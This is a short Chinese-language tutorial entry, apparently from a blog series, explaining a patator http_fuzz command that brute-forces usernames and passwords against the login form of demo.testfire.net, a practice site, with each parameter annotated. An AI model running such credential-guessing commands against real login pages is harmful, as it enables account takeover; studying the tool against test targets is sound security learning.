破解网页登入帐密
patator http_fuzz url=http://demo.testfire.net/doLogin body="uid=FILE0&passw=FILE1&btnSubmit=Login" method=POST follow=1 accept_cookie=1 persistent=1 before_urls=http://demo.testfire.net/login.jsp 0=/home/kali/user.lst 1=/home/kali/password.lst -x ignore:fgrep="Login Failed"
http_fuzz > 猜解HTTP/HTTPS的登入帐号密码
url=http://demo.testfire.net/doLogin > 要进行暴力破解的网址
body="uid=FILE0&passw=FILE1&btnSubmit=Login" > 要传送的栏位内容
FILE > 传递测试帐号密码的占位符
method=POST > Request的方法
follow=1 > 是否会转址。0为不会,1为会
accept_cookie=1 > 是否保存cookies作为之後request使用。0为不会,1为会
persistent=1 > 是否要持续连线。0为不会,1为会
before_urls=http://demo.testfire.net/login.jsp > 针对主要url进行攻击前,先request哪些网址
-x ignore:fgrep="Login Failed" > 设定当破解结果符合fgrep="Login Failed",就执行ignore
ignore > 忽略本笔测试,也不回报结果
fgrep="Login Failed" > 从回传的资料中比对Login Failed字串
<<: [Day 29] 从零开始学Python - 打包安装PyInstaller:谁把谁的灵魂,装进谁的身体
>>: 《Day29》Oracle Database 实体档案
第一部分(建立档案以及设定资料库) composer create-project laravel/...
指定运算子(Assignment Operators) (x = y) : 将 y 值指定给 x 变...
今天这篇进度比较差,但是也就只能这样继续努力debug。 首先先简介一下原本的进度,是要将initr...
说http之前,先説tcp/ip,tcp/ip是传输层的协议,这个协议是会保证传到的,而直接使用tc...
本日任务说明 继昨天完成的Quiz App(原生JS版)後,这次要来看的是Vue版:Demo Lin...